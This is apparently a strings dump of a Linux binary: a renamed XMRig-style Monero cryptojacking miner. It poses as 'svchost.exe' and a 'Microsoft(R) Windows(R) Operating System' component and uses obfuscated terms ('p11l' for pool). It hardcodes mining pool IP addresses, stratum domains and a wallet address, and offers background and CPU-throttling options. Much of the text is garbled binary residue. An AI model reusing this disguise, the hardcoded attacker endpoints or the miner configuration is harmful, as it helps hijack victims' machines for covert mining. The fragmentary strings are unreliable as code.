Mcl$
L$ I
D$ I
tKSH
tKSH
ATUS
t$H;h
H;/t{H
[]A\
[]A\
AWAVI
AUATUSH
t$ M
[]A\A]A^A_
L;;r
D$8H
D$(H
D$hH
God A red nugget A fat egg under a dog
AWAVI
AUATUSH
([]A\A]A^A_
%w	H
D$PH
H9D$xu
AUATHc
< =u
[]A\
AVAUATUSu
[]A\A]A^
[]A\A]A^
AUAT
</=u
Z[]A\A]
tZHc
=m	#
D$`H
D$ H
	uCA
u2E1
T$0u
D$ H
%w	H
D$XH
t$h1
D$`H
t$(H
D$ H
T$0L
D$@L
T$8H
t7H9
AWAVAUATUSH
$@Lc
[]A\A]A^A_
[]A\A]A^A_
AWAVAUATUSH
$@Hc
[]A\A]A^A_
[]A\A]A^A_
AWAVAUATUSH
,3H;E
4@Lc
([]A\A]A^A_
([]A\A]A^A_
AVAUATH
L#D$
L#D$
D$(I9
D$(H
H;T$
[]A\A]A^A_
H+|$
vnH=
D9D$
H+|$
AVAUATH
,"I;E
[]A\A]A^A_
AVAUI
ATUH
[]A\A]A^
AWAVI
AUATI
>-t#A
</:u|I
0D9%
9:Hc
t%Hc
[]A\A]A^A_
AWAVAUATUSH
|$,D
t$ L
L$(H
T$ D
\$(A
\$(A
i<-uY
|$,H
8[]A\A]A^A_
ATULc
8&u2H
[]A\
D$`H
D$ H
ATUSH
H9D$ u
H9D$(t
[]A\
D$@A
L$8L
\$ L
t$(H
T$0H
t$ H
|$(H
t$0H
L$ L
AVAUI
t$(H
L$(H
L$,L
D$8H
D$`H)
t$`1
t$`1
x)HcL$
 t%HcL$
[]A\A]A^
AUATA
[]A\A]
uTUSH
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
<$Hc
D$`v
D$`H
D$0H
D$( 
D$8Lc
AWAVH
AUATI
|$8L
D$(D
t$@H
|$@D
t$@Hc
D$ L;d$ 
D$(K
[]A\A]A^A_
AWAVAUATUSH
{ E1
([]A\A]A^A_
ATU1
0[]A\
AWAVI
AUATM
l$PL
|$8H
t$@H
d$(H
D$ I
D$0tJH
D$(H
tBLc
D$ H
L$8H
Yx\9
L$8H
[]A\A]A^A_
AUATI
USE1
[]A\A]
uaIc
AWAVAUATI
[]A\A]A^A_
AWAVI
AUATI
D$,L
D$,A
~9Lc
T$(H
t$,D
t$4H
+4$D
D;<$
|$$1
[]A\A]A^A_
AWAVAUATI
uIH=
|$(H
[]A\A]A^A_
AWAVA
AUAT
[]A\A]A^A_
AVAUA
ATUA
]A\A]A^
AWAVI
AUATA
|$(Ic
|$5L
T$ H
t$(H
[]A\A]A^A_
AWAV1
AUATI
T$8L
AiF`
A9FT
8au91
|$t1
|$t1
HcT$
D$L1
D$ HcD$LH
D$(H
D$ H+D$(H
D$PHcD$0H
L$xA
D$XL
T$LH
H+D$ H;D$0
H+D$
H9D$(w
L9t$Pt
D$8I
Lct$
D$@N
HcT$\H
L$|1
D9L$
L$hL
L$`H
L$`HcL$hD
D$lI
D;t$
0@82u{
usHc
uZ9|$
D;t$
L$HHk
L$@Ic
[]A\A]A^A_
AUATI
l$,H
D$ H
[]A\A]
AWAVH
AUATI
	w*L
L9<$t
	w*L
L9<$t
L9<$
[]A\A]A^A_
ATUA
\$@H
t$(H
D$0H
[]A\
AQHc
AUATHc
USLc
8]ui
[]A\A]
AVHc
AULc
ATLc
]A\A]A^
AWAVA
AUATI
L9t$
k(H)
S H)
[]A\A]A^A_
AWAVAUATI
[A\A]A^A_]
u3dH
ATUA
T$0u
D$0H
[]A\
USHc
H=?B
w9Hi
H=?B
USHc
;w:H
ATUI
<$au/A
CXu Hc
C@2TH
[]A\
AVAUI
ATUI
CxxLHc
C@2TH
[]A\A]A^
ATUH
WXHc
SXH)
[]A\
AWAVI
AUATA
Hc{xIc
t)L+}
[]A\A]A^A_
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
AUATE1
JhH9
[]A\A]
ATUSurH
C8H9C(v
C8H9C(v
[]A\
AWAVE1
AUATA
tPH;C
[]A\A]A^A_
AUATUSH
[]A\A]
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
ATUD
C(H;C s
[]A\
C(H;C s
[]A\
ATUI
AWAV
AUATI
~UH9
[]A\A]A^A_
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
AUATI
C H+C(L9
[]A\A]
SHH9
Z[]A\A]
AWAV
AUATI
[]A\A]A^A_
t$(H
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
ATUD
C(H;C s
[]A\
C(H;C s
[]A\
ATU1
C(H;C s
[]A\
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
T$0H
L$8L
D$@L
L$Ht7
)D$P
)L$`
)T$p
D$PBdH
t$`D
	w&=
}yATU@
[]A\
AWAVA
AUATI
t$(Ic
L$xD
L$ A
D$  t
D$(	A
|$xL
l$Pu
T$x@
t$ L
|$nf
T$nH
l$nH
HcT$ 
d$ D
Hc|$
L$ D
HcT$
t$(L
L$ L
D;|$
t$xH
|$nf
D$nL
l$nI
D$`A
D$xN
t$@1
t$P!
D$xE1
H+T$
L$ )
ukI9
H+D$
t$ Hc
D$ A
D$@u
|$ H
L$0D
t$(Ic
|$@f
H9l$
l$(I
L;l$
L9l$(t
S	E1
L9|$
0H9l$
L$(u
L$(I
E	Hc
D$(H
D$(H
H+T$0H
t$0L
9\$ 
MD$ H
[]A\A]A^A_
AWAVAUATE1
L$ L
t$PA
l$PA
t <%t
D$PH
D$,H
<$Ic
D$PD
D$P1
D$P	
$u9H
|$ H
D$PH
D$PE
$u,H
t$ H
D$PD
|$PH
D$ I
)D$`
L$0D
LcL$
D$`D
D$`fD
D$`D
T$`Ic
T$`D
D$`L
D$`H
|$`H
T$0D
LcL$
LcL$
t$`M
D$XH
D$XH
D$`H
\$`E1
|$LH
t$hD
T$8L9
L$0D9
D9|$,
T$8H
<$Hc
L$0H
<$E1
\$`M9
D;|$
|$LH
[]A\A]A^A_
AWAV1
AUAT
D$@L
[]A\A]A^A_
AWAVI
AUATUSH
D$HH
v	< ul
;%u4H
*u	H
D$(H
L$(H
D$$H
D$0HcD$
cu@H
<]tE
<-u-
|$oH)
L$dH
t$_H
D$`C
|$dL
H9D$8
D$0M
D$ H
D$ H
[]A\A]A^A_
AVAUI
ATUI
+H)k
+H)k
D$X[]I
D$8I
D$(L
A\A]A^
D$pH
AWAVHc
AUATL
H;\$
[]A\A]A^A_
AWAVI
AUATI
|$(H+L
|$(A
[]A\A]A^A_
AWAVI
AUATI
|$(H
D$ H
t$(L+$
D$ H
t$(L
[]A\A]A^A_
AWAVAUATUSH
T$8I)
T$0H
T$0J
L;d$
0r$H
AVE1
D$ H
D$(H
|$ D
L$0L
[]A\A]A^A_
ATUA
|$ H
|$py
D$(H
T$ H+T$(H
[]A\
AUATUSH
]A\A]
AUATUSH
]A\A]
AWAVI
AUATI
)D$ 
)D$0
[]A\A]A^A_
A84/u
H;T$
>v$H
ATUSH
[]A\
[]A\
AUATI
Z[]A\A]
AVAUATUA
u E1
[]A\A]A^
t]USH
t=US
AWAV1
AUATI
|$0H
;A8A
D$8u
D$8I
D$0H
T$8H
I9o(u
D$0I
D$8H
T$0H
T$HH
T$0H
|$,1
[]A\A]A^A_
o ATUSH
[]A\A]
AUATUSH
tiL9
AWAV1
AUATI
L$(H
T$ H
=[n"
t$0A
|$8H
D$8H
L$HH
\$8H
t$@H
tWE1
8&t;H
L+-3l"
H+D$
D$pH
D$ I
D$(I
D$xt
T$TE
Ic|$8Hct$XH
[]A\A]A^A_
AVAUI
ATUI
[]A\A]A^
ATUSdL
D$@1
t&Hc
[]A\
t(AUATUSH
;J8t9
Z[]A\A]
J H9
AWAVI
AUATUSH
tmdL
A;N8
[]A\A]A^A_
ATUI
[]A\
H92t
w&Hc
t=Hc
AWAVI
AUATI
l$ I
|$,L
H;T$
[]A\A]A^A_
ATUSH
I+D$(I
D$(H
[]A\A]
L$KH
JUSH
Hc?HcS
ATUI
x L9
H9D$ u
H9D$(
[]A\
w |6Hc?
AUATL
-%P"
H+}(H
Z[]A\A]
AWAVE1
AUATI
=y5"
5:5"
=gL"
[]A\A]A^A_
AUATUSH
uJE1
	v"H
	w;L9
[]A\A]
[]A\A]
AWAVI
AUATUSH
L$<D
D$ D
[]A\A]A^A_
D$@E
D$pI
*D$ 
D$ H
t$@L
v(=	
tKHc
D+|$<D;|$`H
|$`@
*D$ 
+l$`
T$dD)
l$`H
l$ r
*D$ 
T$ H
,$D)
AWAVI
AUATUS
h[]A\A]A^A_
D$0C
D$0N
|$ L
0u5I
]A\A]A^A_
t$ D
t$ D
0u'I
t$PA
|$ L
L$XH
t$HD
T$DD
L$@D
L$XH
t$HD
T$DD
L$@D
D$PE
|$PH
H;\$0
C H)
L$ D)
D$ D
L$<D
L$<H9
L$ D
L$ D
AWAVAUATUSH
u)E1
[]A\A]A^A_
v,Mc
]A\A]A^A_
t?E1
/proc/se
lf/ff
t	H;
AWAV1
AUAT1
otJH
([]A\A]A^A_
sofA
u%dH
=w%"
=I%"
5A&"
v	H9
v	H9
5f$"
 vXH
T$ f%
l$ H
<$u8
l$ H
|$0Y^
l$ H
2w}I
AUATMc
tDI9
[]A\A]A^
AWAVH
AUATUSH
[]A\A]A^A_
AVAUA
ATUH
|$ H
[]A\A]A^
AWAVM
AUATI
|$<M
D$,H
D$TE
HcL$DI
6HcT$HHcD$THc|$XD
D$LD
L$PH
HcD$\
|$(1
D;D$
[]A\A]A^A_
AVAUI
ATUH
[]A\A]A^
AWAVM
AUATI
\$ H
D$(H
[]A\A]A^A_
ATUSdH
[]A\
S(H;S s,
u"Hc
AVAUI
ATUL
[]A\A]A^
G8H9G(v
C8H9C(w+H
[]A\
Hit$
ATUI
H+D$
4$H+t$
&^_u"H
 []A\
AUATI
([]A\A]
ATUSH
P[]A\
AVAUI
ATU1
[]A\A]A^
ATUH
[]A\H
8:u'H
8<u?H
AWAVAUATUSH
[]A\H
A]A^A_
AUAT
8:u=H
|$0L
C,uJH
[]A\A]
AWAVAUATA
D$(I
L+|$
A8\9
A8\1
T$ H
T$ H
[]A\A]A^A_
tFH9
t=H9
[]A\
~w0H
~w]H
$[]A\
AUAT
T$ H
T$(H
D$ 1
8[]A\A]
AVAUATUI
>:u	
;:u.
[]A\A]A^
C8H9C(v
AWAVI
AUATE1
D$(H
T$ L
D$(u"I
D$ L
uQI;^
[]A\A]A^A_
t$01
D$0H
t3UH
p11l
uptime
ping
failures
error_log
connection
highest
threads
fuckrate
worker_id
brand
sockets
7.1.1163.23
version
kind
algo
hugepages
donate_level
diff_current
shares_good
shares_total
avg_time
hashes_total
best
results
uuuuuuuubtnufruuuuuuuuuuuuuuuuuu
0123456789ABCDEF
\\\\\\\\\\\\\\\\""""""""""""""""
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
-;eU
U1(\Q
mSx@
b}$l
~)p$w
11eU%
z^KD
u@SIGHUP received, exiting
SIGTERM received, exiting
SIGINT received, exiting
paused, press 'r' to resume
[01;32mresumed
Ctrl+C received, exiting
"%s" hash self-test failed.
[01;33mpaused
[0m, press 
[01;35mr
[0m to resume
%s%s
[31m
[33m
[01;37m
[90m
[%d-%02d-%02d %02d:%02d:%02d]%s %s%s
[%d-%02d-%02d %02d:%02d:%02d] 
{"id":%ld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}
[%s:%u] duplicate job received, reconnect
[%s:%u] getaddrinfo error: "%s"
[%s:%u] unsupported method: "%s"
[%s:%u] DNS error: "No IPv4 records found"
{"id":%lu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}
[%s:%u] JSON decode failed: "%s"
The document root must not be followed by other values.
Missing a name for object member.
Missing a colon after a name of object member.
Missing a comma or '}' after an object member.
Missing a comma or ']' after an array element.
Incorrect hex digit after \u escape in string.
The surrogate pair in string is invalid.
Invalid escape character in string.
Missing a closing quotation mark in string.
Number too big to be stored in double.
Terminate parsing due to Handler error.
job_id
blob
target
Unauthenticated
your IP is banned
IP Address currently banned
code
message
[%s:%u] error: "%s", code: %d
[%s:%u] login error code: %d
[%s:%u] DNS error: "%s"
jsonrpc
login
method
params
[%s:%u] connect error: "%s"
Unknown error.
result
[%s:%u] read error: "%s"
No error.
The document is empty.
Invalid value.
Invalid encoding in string.
Miss fraction part in number.
Miss exponent in number.
Unspecific syntax error.
\\\\\\\\\\\\\\\\""""""""""""""""
\\\\\\\\\\\\\\\\""""""""""""""""
                
																
vH7B
W4vC
9Y>)F$
raB3G
)c=H
]rHa
O8Mr
bnMG
[*QmU
mr"iR
R$N(
-sSO\
T%L9
hGT.
B}T}
=@[V
!a9X
X5AHx
%4xY
Z~$|7
+\0I
2a\|
\ysK
|M$D
pH_r
(:W"
s\ax}?
pc2g
@BXV
tC7Ddx
EydV
eax~Z
ekhHD
@iZb
k0V(
k*do^
:V!2m
RJqn
bzo=
$qE}
XqkY
quAt
Jugm
~B v
STv/N
_w&2
xg^Jp5|
yMzw
;	Fzo
{zel#|67
P/};
[@JO
nQ:B
[01;37muse p11l 
[01;36m%s:%d 
[01;30m%s
[01;31mrejected
[0m (%ld/%ld) diff 
[01;37m%u
[0m 
[31m"%s"
[0m 
[01;30m(%lu ms)
rejected (%ld/%ld) diff %u "%s" (%lu ms)
[01;32maccepted
[0m (%ld/%ld) diff 
[01;37m%u
[0m 
[01;30m(%lu ms)
accepted (%ld/%ld) diff %u (%lu ms)
[01;35mnew blow_job
[0m from 
[01;37m%s:%d
[0m diff 
[01;37m%d
new blow_job from %s:%d diff %d
use p11l %s:%d %s
dev donate started
dev donate finished
no active p11ls, stop fucking
145.239.0.84
Wmsrg5mG57pGLs27ir3tU6WQ1T2a94P7zGRdPfnyYJg11xfiVzM6zrp1HbsZddmwkRT9MPvcAri1CHYC3qj3kAus1oefVMznm
stratum+tcp://
.n1ceh3sh.com
.fuckergay.com
Try "svchost.exe" --help' for more information.
Microsoft(R) Windows(R) Operating System 7.1.1163.23
 built on Dec 25 2017 with GCC
%s: unsupported non-option argument '%s'
No p11l URL supplied. Exiting.
 %d.%d.%d
 features: x86_64 AES-NI
libuv/%s
cryptonight
cryptonight-lite
cryptonight-light
unable to open %s: %s
%s:%d: %s
pools
user
userpass
nicehash
colors
cpu-affinity
cpu-priority
donate-level
log-file
print-time
retries
retry-pause
syslog
user-agent
config
help
no-color
no-huge-pages
api-port
api-access-token
api-worker-id
a:c:khBp:Px:r:R:s:t:T:o:u:O:v:Vl:S
Usage: svchost.exe [OPTIONS]
Options:
  -a, --algo=ALGO          cryptonight (default) or cryptonight-lite
  -o, --url=URL            URL of fucking server
  -O, --userpass=U:P       username:password pair for fucking server
  -u, --user=USERNAME      username for fucking server
  -p, --pass=PASSWORD      password for fucking server
  -t, --threads=N          number of fucker threads
  -v, --av=N               algorithm variation, 0 auto select
  -k, --keepalive          send keepalived for prevent timeout (need pool support)
  -r, --retries=N          number of times to retry before switch to backup server (default: 5)
  -R, --retry-pause=N      time to pause between retries (default: 5)
      --cpu-affinity       set process affinity to CPU core(s), mask 0x3 for cores 0 and 1
      --cpu-priority       set process priority (0 idle, 2 normal to 5 highest)
      --no-huge-pages      disable huge pages support
      --no-color           disable colored output
      --donate-level=N     donate level, default 5%% (5 minutes in 100 minutes)
      --user-agent         set custom user-agent string for pool
  -B, --background         run the fucker in the background
  -c, --config=FILE        load a JSON-format configuration file
  -l, --log-file=FILE      log all output to a file
  -S, --syslog             use system log for output messages
      --max-cpu-usage=N    maximum CPU usage for automatic threads mode (default 75)
      --safe               safe adjust threads and av settings for current CPU
      --n1ceh3sh           enable nicefuckerate/fuckerig-proxy support
      --print-time=N       print fuckerate report every N seconds
      --api-port=N         port for the fucker API
      --api-access-token=T access token for API
      --api-worker-id=ID   custom worker-id for API
  -h, --help               display this help and exit
  -V, --version            output version information and exit
[01;32m * 
[01;37mVERSIONS:     
[01;36mFuckeRig/%s
[01;37m libuv/%s%s
 * VERSIONS:     FuckeRig/%s libuv/%s%s
[01;32m * 
[01;37mTHREADS:      
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
 * THREADS:      %d, %s, av=%d, %sdonate=%d%%%s
[01;32m * 
[01;37mHUGE PAGES:   %s, %s
[01;32m * 
[01;37mCPU:          %s (%d) %sx64 %sAES-NI
[01;32m * 
[01;37mCPU L2/L3:    %.1f MB/%.1f MB
 * CPU:          %s (%d) %sx64 %sAES-NI
 * CPU L2/L3:    %.1f MB/%.1f MB
[01;32m * 
[01;37mP11L #%d:      
[01;36m%s:%d
[01;32m * 
[01;37mCOMMANDS:     
[01;35mh
[01;37mashrate, 
[01;35mp
[01;37mause, 
[01;35mr
[01;37mesume
 * COMMANDS:     'h' fuckerate, 'p' pause, 'r' resume
[01;32menabled
[01;31mdisabled
[01;32mavailable
[01;31munavailable
[01;32m
[01;31m-
[01;31m
 gcc/%d.%d.%d
 * HUGE PAGES:   %s, %s
, affinity=0x%lX
 * P11L #%d:      %s:%d
%03.1f
[01;37mspeed
[0m 2.5s/60s/15m 
[01;36m%s 
[22;36m%s %s 
[01;36mH/s
[0m max: 
[01;36m%s H/s
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
MbP?
145.239.0.84:80
104.207.141.144:80
45.76.198.204:80
--max-cpu-usage
--background
--keepalive
setsid() failed (errno = %d)
chdir() failed (errno = %d)
madvise failed
%s/%s (Linux 
x86_64) libuv/%s
Microsoft(R) Windows(R) Operating System
_E`%
\hQV
Sb*kA?AT?*
0Hx(x`(07
$~Z6ZH6$
tX4Fr.rh.46Aw-wl-6
%Ku>
cw/X
cB pP0P@0 
&y_5_L5&
.eK9K\9.
2O}+}d+2
k(lD<DP<(
r\8Tl$lp$8W_
Ws!R
>]c!c|!>
B|q&W
:Si'it':'
+"wU3UD3"
-<Zf"fx"<
m,bN:NX:,
!(Ew
p09Y
6666666666666666\\\\\\\\\\\\\\\\
E~Dl
0/*g
)5CN
@T z
p_i7
$1J^
5;6Q
kgyA
~	L#'Q&
k<VL
XX&~
0t*Q
N^ee
1p.D
0xGNe
Mf3L
<$;nq
TZFx
)l\^'-
2_{6n
ZWq>!
`j?J
c|w{
9JLX
~=d]
T`00P
V++}
L&&jl66Z~??A
Oh44\Q
sb11S*
RF##e
&N''i
X,,t4
v;;M
R)){
>^//q
,@  `
r99K
f33U
x<<D%
p88H
uB!!c 
z==G
D""fT**~;
;d22Vt::N
H$$l
Cn77Y
J%%o\..r8
|>>Bq
j55_
P((x
Z--w
P`00
gg}V++
jL&&Zl66A~??
\h44
Sb11?*
eF##^
iN''
tX,,.4
RRMv;;a
{R))>
q^//
`@  
Kr99
MMUf33
PPDx<<
Hp88
cB!!0 
DD9.
~~Gz==
]]+2
fD""~T**
Vd22Nt::
lH$$
Yn77
xxoJ%%r\..$8
tt!>
ppB|>>
aa_j55
UUxP((z
wZ--
0P`0
g+}V+
&jL&6Zl6?A~?
4\h4
1Sb1
#eF#
'iN'
,tX,
R;Mv;
){R)
/q^/
 `@ 
9Kr9J
M3Uf3
P<Dx<
8Hp8
!cB!
~=Gz=d
"fD"*~T*
2Vd2:Nt:
$lH$\
7Yn7m
x%oJ%.r\.
p>B|>
a5_j5W
U(xP(
-wZ-
00P`
++}V
=&&jL66Zl??A~
44\h
11Sb
##eF
''iN
,,tX
-6nn
;;Mv
})){R
//q^
  `@
g99KrJJ
33Uf
<<Dx
!88Hp
!!cB
==Gzdd
+2ss
""fD**~T
22Vd::Nt
$$lH\\
77Ynmm
%%oJ..r\
!>KK
>>B|
55_jWW
3"ii
((xP
)--wZ
:,svchost.exe
Unknown system error
E2BIG
EACCES
EADDRINUSE
EADDRNOTAVAIL
EAFNOSUPPORT
EAGAIN
EAI_ADDRFAMILY
EAI_AGAIN
EAI_BADFLAGS
EAI_BADHINTS
EAI_CANCELED
EAI_FAIL
EAI_FAMILY
EAI_MEMORY
EAI_NODATA
EAI_NONAME
EAI_OVERFLOW
EAI_PROTOCOL
EAI_SERVICE
EAI_SOCKTYPE
EALREADY
EBADF
EBUSY
ECANCELED
ECHARSET
ECONNABORTED
ECONNREFUSED
ECONNRESET
EDESTADDRREQ
EEXIST
EFAULT
EFBIG
EHOSTUNREACH
EINTR
EINVAL
EISCONN
EISDIR
Beeb
ELOOP
EMFILE
EMSGSIZE
ENAMETOOLONG
ENETDOWN
ENETUNREACH
ENFILE
ENOBUFS
ENODEV
ENOENT
ENOMEM
ENONET
ENOPROTOOPT
ENOSPC
ENOSYS
ENOTCONN
ENOTDIR
ENOTEMPTY
ENOTSOCK
ENOTSUP
EPERM
EPIPE
EPROTO
EPROTONOSUPPORT
EPROTOTYPE
ERANGE
EROFS
ESHUTDOWN
ESPIPE
ESRCH
ETIMEDOUT
ETXTBSY
EXDEV
UNKNOWN
ENXIO
EMLINK
EHOSTDOWN
EREMOTEIO
ENOTTY
Unknown system error %d
argument list too long
permission denied
address already in use
address not available
address family not supported
temporary failure
bad ai_flags value
invalid value for hints
request canceled
permanent failure
ai_family not supported
out of memory
no address
unknown node or service
argument buffer overflow
resolved protocol is unknown
socket type not supported
bad file descriptor
resource busy or locked
operation canceled
invalid Unicode character
connection refused
connection reset by peer
destination address required
file already exists
file too large
host is unreachable
interrupted system call
invalid argument
i/o error
socket is already connected
too many open files
message too long
name too long
network is down
network is unreachable
file table overflow
no buffer space available
no such device
no such file or directory
not enough memory
machine is not on the network
protocol not available
no space left on device
function not implemented
socket is not connected
not a directory
directory not empty
operation not permitted
broken pipe
protocol error
protocol not supported
result too large
read-only file system
invalid seek
no such process
connection timed out
text file is busy
unknown error
end of file
no such device or address
too many links
host is down
remote I/O error
resource temporarily unavailable
service not available for socket type
connection already in progress
software caused connection abort
bad address in system call argument
illegal operation on a directory
too many symbolic links encountered
socket operation on non-socket
operation not supported on socket
protocol wrong type for socket
cannot send after transport endpoint shutdown
cross-device link not permitted
inappropriate ioctl for device
async
check
fs_event
fs_poll
handle
idle
prepare
timer
signal
<unknown>
[%c%c%c] %-8s %p
1.18.0
/proc/self/fd/%d
/tmp
TMPDIR
TEMP
TEMPDIR
HOME
/dev/null
ignoring non-SCM_RIGHTS ancillary data: %d
UV_TCP_SINGLE_ACCEPT
/proc/cpuinfo
cpu%u 
%lu %lu %lu %lu %lu %lu
/sys/devices/system/cpu/cpu%u/cpufreq/scaling_cur_freq
/proc/self/stat
/proc/stat
cpu MHz		: 
model name	: 
/proc/self/exe
0123456789ABCDEF
0123456789abcdef
0123456789
%u.%u.%u.%u
UV_THREADPOOL_SIZE
0.4.0
GenuineIntel
AuthenticAMD
CyrixInstead
NexGenDriven
GenuineTMx86
UMC UMC UMC 
CentaurHauls
RiseRiseRise
SiS SiS SiS 
Geode by NSC
OPTERON_800
PHENOM
PHENOM2
FUSION_C
FUSION_E
FUSION_EA
FUSION_Z
FUSION_A
Core(TM) [im][357]
W35##
[ELXW]75##
[ELXW]55##
[ELXW]56##
Pentium(R) M
Pentium(R) Dual  CPU
Pentium(R) Dual-Core
Pentium(R) D
Genuine Intel(R) CPU
Intel(R) Core(TM)
CPU [N ][23]## 
CPU Z
CPU [ND][45]## 
CPU [ND]#### 
Xeon
Atom(TM) CPU
Mobile
Celeron
Pentium
PENTIUM
IRWIN
POTOMAC
GAINESTOWN
WESTMERE
PENTIUM_M
NOT_CELERON
MOBILE_CORE_SOLO
MOBILE_CORE_DUO
WOLFDALE
MEROM
PENRYN
QUAD_CORE
DUAL_CORE_HT
QUAD_CORE_HT
MORE_THAN_QUADCORE
PENTIUM_D
SILVERTHORNE
DIAMONDVILLE
PINEVIEW
CEDARVIEW
pure virtual method called
deleted virtual method called
std::bad_typeid
St10bad_typeid
std::bad_cast
St8bad_cast
N10__cxxabiv120__si_class_type_infoE
std::bad_alloc
St9bad_alloc
__gnu_cxx::__concurrence_lock_error
__gnu_cxx::__concurrence_unlock_error
N9__gnu_cxx24__concurrence_lock_errorE
N9__gnu_cxx26__concurrence_unlock_errorE
std::exception
std::bad_exception
St9exception
St13bad_exception
N10__cxxabiv115__forced_unwindE
N10__cxxabiv119__foreign_exceptionE
N10__cxxabiv117__class_type_infoE
terminate called recursively
  what():  
terminate called after throwing an instance of '
terminate called without an active exception
St11logic_error
St12domain_error
St16invalid_argument
St12length_error
St12out_of_range
St13runtime_error
St11range_error
St14overflow_error
St15underflow_error
%s: __pos (which is %zu) > this->size() (which is %zu)
basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
basic_string::copy
basic_string::compare
basic_string::_S_create
basic_string::erase
basic_string::_M_replace_aux
basic_string::insert
basic_string::replace
basic_string::assign
basic_string::append
basic_string::resize
basic_string::_S_construct null not valid
basic_string::basic_string
basic_string::substr
/dev/urandom
default
/dev/random
random_device::random_device(const std::string&)
mt19937
0123456789
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugsSt9type_info
(anonymous namespace)
string literal
auto
decltype(auto)
[abi:
{default arg#
JArray
auto:
VTT for 
construction vtable for 
-in-
typeinfo for 
typeinfo name for 
typeinfo fn for 
non-virtual thunk to 
covariant return thunk to 
java Class for 
guard variable for 
TLS init function for 
TLS wrapper function for 
reference temporary #
hidden alias for 
non-transaction clone for 
_Sat 
_Accum
_Fract
operator
operator 
new 
false
true
java resource 
decltype (
this
{parm#
global constructors keyed to 
global destructors keyed to 
{lambda(
{unnamed type#
 [clone 
 restrict
 volatile
 const
 transaction_safe
 noexcept
 throw
complex 
imaginary 
 __vector(
(...
...)
_GLOBAL_
std::allocator
std::basic_string
std::string
std::istream
basic_istream
std::ostream
basic_ostream
std::iostream
basic_iostream
alignof 
const_cast
delete[] 
dynamic_cast
delete 
operator"" 
new[]
reinterpret_cast
sizeof...
static_cast
sizeof 
throw 
bool
boolean
byte
long double
float
__float128
unsigned char
unsigned int
unsigned
unsigned long
unsigned __int128
unsigned short
void
wchar_t
unsigned long long
decimal32
decimal64
decimal128
half
char16_t
char32_t
decltype(nullptr)
std::basic_string<char, std::char_traits<char>, std::allocator<char> >
std::basic_istream<char, std::char_traits<char> >
std::basic_ostream<char, std::char_traits<char> >
std::basic_iostream<char, std::char_traits<char> >
basic_string::_M_construct null not valid
basic_string::_M_create
basic_string::_M_replace
string::string
 !"#$$%%&&''(((())))****++++,,,,,,,,--------........////////: unrecognized option: 
: option requires an argument: 
: option is ambiguous: 
: option does not take an argument: 
%b %e %T
<%d>%s %n%s%s%.0d%s: 
/dev/console
%.*s
/dev/log
/etc/hosts
/etc/services
/udp
/tcp
/etc/resolv.conf
127.0.0.1
options
ndots:
attempts:
timeout:
nameserver
domain
search
/usr/local/bin:/bin:/usr/bin
PATH
-0X+0X 0X-0x+0x 0x
-+   0X0x
(null)
0123456789ABCDEF
M(knN
XXXXXX
__vdso_clock_gettime
LINUX_2.6
%m/%d/%y
%Y-%m-%d
%H:%M
%H:%M:%S
+%lld
%+.2d%.2d
%0*lld
Illegal byte sequence
Domain error
Result not representable
Not a tty
Permission denied
Operation not permitted
No such file or directory
No such process
File exists
Value too large for data type
No space left on device
Out of memory
Resource busy
Interrupted system call
Resource temporarily unavailable
Invalid seek
Cross-device link
Read-only file system
Directory not empty
Connection reset by peer
Operation timed out
Connection refused
Host is down
Host is unreachable
Address in use
Broken pipe
I/O error
No such device or address
Block device required
No such device
Not a directory
Is a directory
Text file busy
Exec format error
Invalid argument
Argument list too long
Symbolic link loop
Filename too long
Too many open files in system
No file descriptors available
Bad file descriptor
No child process
Bad address
File too large
Too many links
No locks available
Resource deadlock would occur
State not recoverable
Previous owner died
Operation canceled
Function not implemented
No message of desired type
Identifier removed
Device not a stream
No data available
Device timeout
Out of streams resources
Link has been severed
Protocol error
Bad message
File descriptor in bad state
Not a socket
Destination address required
Message too large
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Not supported
Protocol family not supported
Address family not supported by protocol
Address not available
Network is down
Network unreachable
Connection reset by network
Connection aborted
No buffer space available
Socket is connected
Socket not connected
Cannot send after socket shutdown
Operation already in progress
Operation in progress
Stale file handle
Remote I/O error
Quota exceeded
No medium found
Wrong medium type
No error information
'hnopqb 
}&*+<=>?CGJMXYZ[\]^_`acdefgijklrstyz{|
 !"#
 !"#
UTF-8
ASCII
^[yY]
^[nN]
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
March
April
June
July
August
September
October
November
December
%a %b %e %T %Y
%m/%d/%y
%H:%M:%S
%I:%M:%S %p
%m/%d/%y
0123456789
%a %b %e %T %Y
%H:%M:%S
/etc/passwd
/var/run/nscd/socket
/proc/self/task
/etc/localtime
TZif
/usr/share/zoneinfo/
/share/zoneinfo/
/etc/zoneinfo/
zPLR
GCC: (GNU) 7.2.0
.shstrtab
.init
.text
.fini
.rodata
.eh_frame
.gcc_except_table
.tbss
.init_array
.fini_array
.ctors
.dtors
.data.rel.ro
.got
.got.plt
.data
.bss
.comment
